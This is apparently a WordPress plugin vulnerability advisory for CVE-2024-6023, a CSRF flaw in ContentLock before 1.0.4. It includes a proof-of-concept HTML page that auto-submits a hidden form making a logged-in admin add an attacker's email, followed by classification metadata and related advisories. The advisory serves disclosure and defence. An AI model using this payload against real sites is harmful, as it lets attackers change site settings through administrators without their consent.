ContentLock < 1.0.4 – Email Adding via CSRF | CVE 2024-6023 | Plugin Vulnerabilities

Description

The plugin does not have CSRF check in place when adding emails, which could allow attackers to make a logged in admin perform such action via a CSRF attack

Proof of Concept

Make a logged in admin open an HTML file containing:

```
<!DOCTYPE html>
<html>
<head>
    <title>Exploit</title>
</head>
<body>
    <h1>CSRF Exploit</h1>
    <form id="csrfForm" action="https://example.com/wp-admin/admin.php?page=contentlock&group=1" method="post">
        <input type="hidden" name="new_email" value="attacker@mail.com">
		<input type="hidden" name="add_email" value="Add Email">
        <input type="submit" name="submit" value="Add Email">      
    </form>
    <script>
        document.getElementById('csrfForm').submit();
    </script>
</body>
</html>
```

Affects Plugins

Fixed in 1.0.4

References

CVE

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Norbert Hofmann

Submitter

Norbert Hofmann

Submitter website

https://www.linkedin.com/in/norbert-hofmann-53761417/

Verified

Yes

WPVDB ID

6e812189-2980-453d-931d-1f785e8dbcc0

Timeline

Publicly Published

2024-06-21 (about 1 year ago)

Added

2024-06-21 (about 1 year ago)

Last Updated

2025-03-25 (about 9 months ago)

Other

Published

Title

Published

2024-11-23

Title

LinkLaunder SEO <= 0.92.1 - Cross-Site Request Forgery to Stored Cross-Site Scripting

Published

2022-09-21

Title

Demon Image Annotation < 4.8 - Arbitrary Settings Update to Stored XSS via CSRF

Published

2025-02-24

Title

无觅相关文章插件 <= 1.0.5.7 - Cross-Site Request Forgery to Stored Cross-Site Scripting

Published

2025-02-13

Title

Page/Post Specific Social Share Buttons <= 2.1 - Cross-Site Request Forgery to Stored Cross-Site Scripting

Published

2025-12-11

Title

Events Manager – Calendar, Bookings, Tickets, and more! < 7.2.2.3 - Cross-Site Request Forgery to Location Deletion